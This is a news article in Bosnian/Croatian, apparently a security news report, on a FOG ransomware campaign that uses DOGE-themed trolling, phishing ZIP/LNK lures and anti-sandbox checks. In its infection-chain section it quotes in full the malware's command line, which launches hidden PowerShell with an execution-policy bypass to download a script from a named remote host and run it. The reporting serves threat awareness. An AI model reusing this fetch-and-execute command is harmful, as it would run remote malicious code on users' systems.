Istraživači kibernetičke sigurnosti otkrili su sofisticiranu ransomware kampanju u kojoj sajber kriminalci distribuiraju FOG ransomware dok trole žrtve tvrdeći da su povezani s Odjelom za vladinu efikasnost (DOGE), nedavnom inicijativom američke vlade.
Maliciozni softver se širi putem phishing poruka e-pošte koje sadrže naoružane priloge dizajnirane da izgledaju legitimno korisnicima koji ništa ne sumnjaju.
Kampanja, identifikovana analizom devet uzoraka postavljenih na VirusTotal između 27. marta i 2. aprila 2025. godine, pokazuje zabrinjavajuću evoluciju taktike ransomware-a koje kombinuju političke reference sa naprednim tehničkim mogućnostima.
Napadači distribuišu ZIP datoteku pod nazivom “Pay Adjustment.zip” koja sadrži zlonamjerni LNK fajl prerušen u PDF dokument, koji kada se klikne, pokreće složeni lanac infekcije koji vodi do šifrovanja podataka i zahtjeva za otkupninom.
Istraživači Trend Micro-a su otkrili da je od januara 2025. FOG ransomware uticao na otprilike 100 žrtava, pri čemu je u februaru zabilježena najveća koncentracija u 53 slučaja.
Žrtve grupe obuhvataju više sektora, uključujući tehnologiju, obrazovanje, proizvodnju, transport, poslovne usluge, zdravstvenu zaštitu, maloprodaju i potrošačke usluge, što pokazuje rasprostranjenu prijetnju koju ova kampanja predstavlja.
Prema analiziranim uzorcima, napadači ili predstavljaju originalne FOG ransomware operatere koji koriste reference vezane za DOGE kao taktiku trolovanja, ili potencijalno druge sajber kriminalce koji ugrađuju FOG ransomware u svoje binarne datoteke u svrhu lažnog predstavljanja.
Bez obzira na atribuciju, uticaj na pogođene organizacije može biti ozbiljan, što rezultuje finansijskim gubicima i operativnim poremećajima.
Mehanizam infekcije: višestepeno izvršavanje PowerShell-a
Zaraza počinje kada žrtve kliknu na LNK datoteku prerušenu u PDF dokument.
.webp)
Ovo pokreće komandnu liniju koja izvršava naredbu PowerShell za preuzimanje i pokretanje skripte pod nazivom “stage1.ps1” sa udaljenog servera:-
C:\ Windows\System32\cmd. exe /c start "" /min powershell -WindowStyle Hidden -NoProfile -
ExecutionPolicy Bypass -Command "iwr -uri 'https://hilarious-trifle-d9182e.netlify.app/stage1.ps1'
-UseBasicParsing | IEX"Preuzeta PowerShell skripta funkcioniše kao višestepeni učitavač koji preuzima dodatne maliciozne komponente uključujući učitavač ransomware-a (cwiper.exe) i alat za eskalaciju privilegija (ktool.exe).
.webp)
Zanimljivo je da skripta također otvara političke video snimke na YouTubeu i sadrži pisani politički komentar ugrađen direktno u kod.
Prije izvršavanja svog korisnog opterećenja, ransomware obavlja nekoliko provjera anti-sandbox-a, ispituje broj procesora, dostupnost RAM-a, MAC adresu, postavke registra i broj sistemskih tikova.
Ako bilo koja provjera ukazuje na sandbox okruženje, maliciozni softver prekida rad kako bi izbjegao analizu. U suprotnom, nastavlja s dešifrovanjem ugrađene binarne datoteke pomoću specifičnog ključa i počinje šifrovanje datoteka s ekstenzijom “.flocked”.
.webp)
Završno opterećenje ispušta datoteku dbgLog.sys da zabilježi događaje šifrovanja i readme.txt napomenu o otkupnini koja sadrži komunikacijske upute koje usmjeravaju žrtve na skrivenu uslugu Tor.
U poruci se podrugljivo spominje DOGE, pokazujući namjeru napadača da iskoriste trenutne političke teme u svojim taktikama društvenog inženjeringa.
Izvor: CyberSecurityNews